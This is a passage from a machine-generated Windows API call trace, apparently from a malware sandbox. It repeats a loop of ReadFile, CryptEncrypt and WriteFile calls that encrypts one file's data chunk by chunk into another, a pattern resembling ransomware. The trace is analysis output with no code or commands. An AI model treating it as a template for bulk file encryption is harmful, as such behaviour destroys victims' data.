lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.163] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.163] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.163] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.163] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.163] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.163] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.163] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.163] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.163] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.163] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.163] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.163] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.163] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.164] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.164] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.164] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.164] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.164] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.164] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.164] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.164] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.164] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.164] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.164] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.164] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.164] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.164] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.164] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.165] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.165] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.165] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.165] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.165] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.165] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.165] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.165] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.165] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.165] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.165] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.165] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.165] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.165] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.165] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.166] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.166] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.166] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.166] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.166] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.166] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.166] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.166] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.166] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.166] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.166] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.166] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.166] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.166] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.166] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.167] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.167] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.167] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.167] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.167] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.167] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.167] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.167] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.167] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.167] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.167] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.167] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.167] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.167] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.167] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.168] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.168] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.168] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.168] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.168] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.168] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.168] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.168] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.168] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.168] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.168] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.168] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.168] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.168] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.168] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.169] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.169] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.169] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.169] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.169] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.169] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.169] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.169] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.169] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.169] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.169] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.169] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.169] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.169] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.169] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 